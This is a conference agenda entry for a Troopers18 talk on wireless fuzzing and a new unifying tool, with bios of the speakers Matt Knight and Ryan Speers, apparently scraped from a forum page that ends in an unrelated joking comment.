    While fuzzing is known to be a powerful mechanism for fingerprinting and enumerating bugs within hardware and software systems, the application of this technique to wireless systems remains nontrivial due to fragmented and siloed tools. Join us as we cover wireless fuzzing fundamentals and introduce a new tool to unify the approach across protocols, radios, and drivers.
    About the Speakers
    Matt Knight: Matt Knight (@embeddedsec) is a center and left wing for the San Francisco Desert Owls ice hockey team. When his schedule allows he moonlights as a software engineer and security researcher, where he explores the boundaries between software, hardware, and wireless systems. With specific interests in RF networks and physical layers, he notably reverse engineered the LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College.
    Ryan Speers: Ryan Speers is a security researcher and developer who enjoys embedded systems, low-power radio protocols, and reversing proprietary systems. He has worked in offensive and defensive roles on networks, Windows, microcontrollers, and many things in-between. As co-founder at River Loop Security, he tests embedded systems for security issues, and helps clients build more secure systems. He is also Director of Research for Ionic Security where he leads system and cryptographic research. He has previously spoken at a number of security conferences, including Troopers 14, and written some articles for journals ranging from peer-reviewed academic publications to PoC
    Link: https://www.troopers.de/troopers18/agenda/rgdyd3/
  25. 2 points
    If you give me a glittery sword on Metin I'll teach you hacking.